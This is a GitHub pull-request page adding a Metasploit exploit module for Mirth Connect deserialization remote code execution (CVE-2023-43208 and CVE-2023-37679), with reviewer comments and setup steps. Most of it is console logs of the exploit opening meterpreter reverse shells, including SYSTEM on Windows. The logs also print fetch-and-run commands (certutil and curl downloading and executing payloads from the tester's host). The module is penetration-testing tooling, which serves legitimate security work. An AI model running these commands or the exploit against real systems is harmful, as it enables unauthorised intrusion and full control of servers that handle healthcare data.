Add an exploit for Mirth Connect RCE (CVE-2023-43208 and CVE-2023-37679) #18755
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
smcintyre-r7
added
module
docs
rn-modules
Tested on Linux (versions 4.1.1, 4.3.0, and 4.4.0) and Windows (version 4.4.0).
zeroSteiner
force-pushed
the
feat/mod/cve-2023-43208
branch
from
9685a54
to
9e41825
Compare
jvoisin
reviewed
Jan 28, 2024
jheysel-r7
reviewed
Jan 29, 2024
There was a problem hiding this comment.
Great module @zeroSteiner. Thanks for the nice and easy target setup instructions. One minor question about the exploit methods.
Unix Command
msf6 > use mirth_connect_cve_2023_43208
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/mirth_connect_cve_2023_43208 2023-10-25 excellent Yes Mirth Connect Deserialization RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/mirth_connect_cve_2023_43208
[*] Using exploit/multi/http/mirth_connect_cve_2023_43208
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (3045380 bytes) to 192.168.1.78
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.78:51774) at 2024-01-29 11:41:45 -0500
meterpreter > getuid
Server username: mirth
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 22.04 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Windows Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rhost 172.16.199.138
rhost => 172.16.199.138
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set rport 8449
rport => 8449
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set target 1
target => 1
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/windows/http/x64/meterpreter/reverse_tcp (Windows Command)
[*] Sending stage (201798 bytes) to 192.168.1.78
[*] Meterpreter session 2 opened (192.168.1.78:4444 -> 192.168.1.78:54437) at 2024-01-29 13:16:01 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : MSFDEVICE
OS : Windows 11 (10.0 Build 22621).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
| { | ||
| 'Platform' => 'win', | ||
| 'Arch' => ARCH_CMD, | ||
| 'Payload' => { 'Space' => 8191, 'DisableNops' => true } |
There was a problem hiding this comment.
I was wondering where the 8191 was coming from and after reading the definition below it made me realize I've likely written a number of modules that were subject to this limitation but did not include it. Good to know.
Command prompt (Cmd. exe) command-line string limitation
In Command Prompt, the total length of the following command line can't contain more than 8191 characters
jheysel-r7
reviewed
Jan 29, 2024
There was a problem hiding this comment.
Just one nitpick about updating the docs after the most recent change.
Retested, everything is working as expected - I think this is ready to land 👍
Windows Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set verbose true
verbose => true
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Command to run on remote host: certutil -urlcache -f http://192.168.1.78:8080/SSCwCwV_75HP-noz9RKoGA %TEMP%\klTioAXB.exe & start /B %TEMP%\klTioAXB.exe
[*] Fetch Handler listening on 192.168.1.78:8080
[*] HTTP server started
[*] Adding resource /SSCwCwV_75HP-noz9RKoGA
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected target version: 4.4.0
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/windows/http/x64/meterpreter/reverse_tcp (Windows Command)
[+] The target appears to have executed the payload.
[*] Client 192.168.1.78 requested /SSCwCwV_75HP-noz9RKoGA
[*] Sending payload to 192.168.1.78 (Microsoft-CryptoAPI/10.0)
[*] Client 192.168.1.78 requested /SSCwCwV_75HP-noz9RKoGA
[*] Sending payload to 192.168.1.78 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 192.168.1.78
[*] Meterpreter session 5 opened (192.168.1.78:4444 -> 192.168.1.78:55931) at 2024-01-29 14:05:16 -0500
meterpreter > exit
[*] Shutting down session: 5
Unix Command
msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
[*] Command to run on remote host: curl -so ./oYSMVSXND http://192.168.1.78:8080/z3OF01M3YP0rzw1UQ9fhzA; chmod +x ./oYSMVSXND; ./oYSMVSXND &
[*] Fetch Handler listening on 192.168.1.78:8080
[*] HTTP server started
[*] Adding resource /z3OF01M3YP0rzw1UQ9fhzA
[*] Started reverse TCP handler on 192.168.1.78:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected target version: 4.4.0
[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
[+] The target appears to have executed the payload.
[*] Client 192.168.1.78 requested /z3OF01M3YP0rzw1UQ9fhzA
[*] Sending payload to 192.168.1.78 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.1.78
[*] Meterpreter session 6 opened (192.168.1.78:4444 -> 192.168.1.78:55963) at 2024-01-29 14:07:49 -0500
meterpreter > getuid
Server username: mirth
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 22.04 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
| [*] Running automatic check ("set AutoCheck false" to disable) | ||
| [*] Detected target version: 4.1.1 | ||
| [+] The target appears to be vulnerable. Version 4.1.1 is affected by CVE-2023-37679. | ||
| [*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) |
There was a problem hiding this comment.
Suggested change
| [*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) | |
| [*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command) | |
| [+] The target appears to have executed the payload. |
| [*] Running automatic check ("set AutoCheck false" to disable) | ||
| [*] Detected target version: 4.4.0 | ||
| [+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208. | ||
| [*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) |
There was a problem hiding this comment.
Suggested change
| [*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) | |
| [*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command) | |
| [+] The target appears to have executed the payload. |
zeroSteiner
force-pushed
the
feat/mod/cve-2023-43208
branch
from
4e97f1e
to
577898d
Compare
Release NotesThis PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679 and where the former is a patch bypass for the later. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget. |
|
I have tried the exploit on a target Linux system but am getting no session created: I have checked firewall rules and everything, any idea what I maybe doing wrong and why there is no session being created?
|
|
Try using a different |
|
@zeroSteiner It worked thanks! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Mirth Connect versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679 where the former is a patch bypass for the later. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget.
Verification
List the steps needed to make sure this thing works
use exploit/multi/http/mirth_connect_cve_2023_43208RHOSTS,PAYLOADand payload-related optionsDemo (Windows)